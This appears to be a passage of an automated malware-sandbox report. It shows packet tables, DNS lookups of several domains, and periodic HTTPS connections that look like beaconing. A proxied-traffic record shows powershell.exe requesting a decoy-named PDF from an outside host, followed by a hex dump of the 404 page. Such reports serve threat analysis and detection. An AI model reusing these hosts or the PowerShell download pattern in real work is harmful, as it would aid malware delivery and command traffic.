                                                                                                    Dec 5, 2024 10:45:11.036034107 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.036221027 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:11.040474892 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:11.040502071 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.040991068 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.042136908 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:11.087330103 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.577421904 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.577586889 CET44349763148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:11.577646017 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:11.586421013 CET49763443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:15.606585026 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:15.606647015 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:15.606806040 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:15.607064962 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:15.607080936 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:16.867897987 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:16.869394064 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:16.869437933 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:17.329782009 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:17.329859018 CET44349775184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:17.330285072 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:17.330559969 CET49775443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:21.325943947 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:21.325984001 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:21.326100111 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:21.326363087 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:21.326375008 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:22.929033995 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:22.931293964 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:22.931303024 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:23.478269100 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:23.478419065 CET44349791148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:23.478509903 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:23.479129076 CET49791443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:27.500473976 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:27.500533104 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:27.500606060 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:27.500873089 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:27.500891924 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:28.769958019 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:28.776763916 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:28.776788950 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:29.231117010 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:29.231192112 CET44349808184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:29.231287956 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:29.231719971 CET49808443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:33.247113943 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:33.247174025 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:33.247265100 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:33.247566938 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:33.247581959 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:34.646433115 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:34.647806883 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:34.647825003 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:35.195593119 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:35.195770025 CET44349820148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:35.196000099 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:35.196331024 CET49820443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:39.215836048 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:39.215868950 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:39.216034889 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:39.216409922 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:39.216419935 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:40.480072021 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:40.481384993 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:40.481400967 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:40.943681002 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:40.943778038 CET44349836184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:40.943846941 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:40.944379091 CET49836443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:44.981928110 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:44.981981993 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:44.982086897 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:44.982364893 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:44.982376099 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:46.379399061 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:46.380655050 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:46.380685091 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:46.924582958 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:46.924753904 CET44349852148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:46.924824953 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:46.925231934 CET49852443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:50.950463057 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:50.950508118 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:50.950603008 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:50.950870991 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:50.950881958 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:52.403247118 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:52.404925108 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:52.404953003 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:52.862868071 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:52.862935066 CET44349869184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:45:52.863017082 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:52.863517046 CET49869443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:45:56.872566938 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:56.872616053 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:56.872718096 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:56.872991085 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:56.873003960 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:58.268681049 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:58.270092010 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:58.270117044 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:58.810476065 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:58.810648918 CET44349879148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:45:58.810709953 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:45:58.811142921 CET49879443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:02.811127901 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:02.811172009 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:02.811250925 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:02.811546087 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:02.811558008 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:04.073123932 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:04.074505091 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:04.074539900 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:04.535806894 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:04.535892963 CET44349894184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:04.535973072 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:04.536495924 CET49894443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:08.544940948 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:08.544970036 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:08.545104980 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:08.545377970 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:08.545387983 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:09.959769011 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:09.960958958 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:09.961009979 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:10.504759073 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:10.504894018 CET44349910148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:10.504945993 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:10.505377054 CET49910443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:14.529386044 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:14.529454947 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:14.529601097 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:14.529819012 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:14.529830933 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:15.788727999 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:15.790148020 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:15.790219069 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:16.249841928 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:16.249931097 CET44349923184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:16.250000000 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:16.250380993 CET49923443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:20.247437000 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:20.247498989 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:20.248212099 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:20.248514891 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:20.248528004 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:21.663566113 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:21.665294886 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:21.665342093 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:22.212409019 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:22.212583065 CET44349938148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:22.212786913 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:22.213351011 CET49938443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:26.232754946 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:26.232806921 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:26.232891083 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:26.233202934 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:26.233217001 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:27.494355917 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:27.538908958 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:27.543272972 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:27.543279886 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:27.955261946 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:27.955343962 CET44349954184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:27.955403090 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:27.956556082 CET49954443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:31.975545883 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:31.975596905 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:31.975660086 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:31.976104021 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:31.976119995 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:33.567533016 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:33.568870068 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:33.568900108 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:34.114747047 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:34.114880085 CET44349966148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:34.114929914 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:34.115276098 CET49966443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:38.189802885 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:38.189857006 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:38.189925909 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:38.190398932 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:38.190413952 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:39.644202948 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:39.645755053 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:39.645806074 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:40.105617046 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:40.105700016 CET44349981184.171.244.231192.168.2.6
                                                                                                    Dec 5, 2024 10:46:40.105755091 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:40.106364012 CET49981443192.168.2.6184.171.244.231
                                                                                                    Dec 5, 2024 10:46:44.124258041 CET49997443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:44.124310970 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:44.124412060 CET49997443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:44.124705076 CET49997443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:44.124720097 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:45.527985096 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:45.530122042 CET49997443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:45.530150890 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:46.073436975 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:46.073617935 CET44349997148.251.114.233192.168.2.6
                                                                                                    Dec 5, 2024 10:46:46.073714972 CET49997443192.168.2.6148.251.114.233
                                                                                                    Dec 5, 2024 10:46:46.074223042 CET49997443192.168.2.6148.251.114.233

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 5, 2024 10:44:49.288911104 CET5978553192.168.2.61.1.1.1
                                                                                                    Dec 5, 2024 10:44:49.426847935 CET53597851.1.1.1192.168.2.6
                                                                                                    Dec 5, 2024 10:44:52.368650913 CET6035253192.168.2.61.1.1.1
                                                                                                    Dec 5, 2024 10:44:52.609987974 CET53603521.1.1.1192.168.2.6
                                                                                                    Dec 5, 2024 10:44:57.146013021 CET6113653192.168.2.61.1.1.1
                                                                                                    Dec 5, 2024 10:44:57.283761978 CET53611361.1.1.1192.168.2.6
                                                                                                    Dec 5, 2024 10:45:09.486567974 CET6265453192.168.2.61.1.1.1
                                                                                                    Dec 5, 2024 10:45:09.627970934 CET53626541.1.1.1192.168.2.6

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 5, 2024 10:44:49.288911104 CET192.168.2.61.1.1.10x5e55Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:52.368650913 CET192.168.2.61.1.1.10x6c86Standard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:57.146013021 CET192.168.2.61.1.1.10x80fcStandard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:45:09.486567974 CET192.168.2.61.1.1.10xf799Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 5, 2024 10:44:49.426847935 CET1.1.1.1192.168.2.60x5e55No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:49.426847935 CET1.1.1.1192.168.2.60x5e55No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:52.609987974 CET1.1.1.1192.168.2.60x6c86No error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:57.283761978 CET1.1.1.1192.168.2.60x80fcNo error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:44:57.283761978 CET1.1.1.1192.168.2.60x80fcNo error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:45:09.627970934 CET1.1.1.1192.168.2.60xf799No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 5, 2024 10:45:09.627970934 CET1.1.1.1192.168.2.60xf799No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • www.fornid.com
                                                                                                    • www.pineappletech.ae
                                                                                                    • www.almrwad.com
                                                                                                    • www.erp-royal-crown.info

                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.64970993.95.216.1754434904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-05 09:44:51 UTC116OUTGET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                                    Host: www.fornid.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-12-05 09:44:51 UTC549INHTTP/1.1 404 Not Found
                                                                                                    Date: Thu, 05 Dec 2024 09:44:51 GMT
                                                                                                    Server: Apache
                                                                                                    P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                                                    Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskQBDC65jNM1FGUnjzPm4df4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZIX3frqFLG65tdbAz3M6ejQ%3D000075; expires=Wed, 25-Dec-2024 09:44:51 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    2024-12-05 09:44:51 UTC7643INData Raw: 31 31 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                                                                    Data Ascii: 11e58<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                                                    2024-12-05 09:44:51 UTC140INData Raw: 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42 6c 6f 63 6b 20 6c 69 6e
                                                                                                    Data Ascii: enti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /Block lin
                                                                                                    2024-12-05 09:44:51 UTC8192INData Raw: 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65 64 69 6c 69 7a 69 61 22
                                                                                                    Data Ascii: ks module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'edilizia"
                                                                                                    2024-12-05 09:44:51 UTC8192INData Raw: 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                                                    Data Ascii: te" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www.fornid.
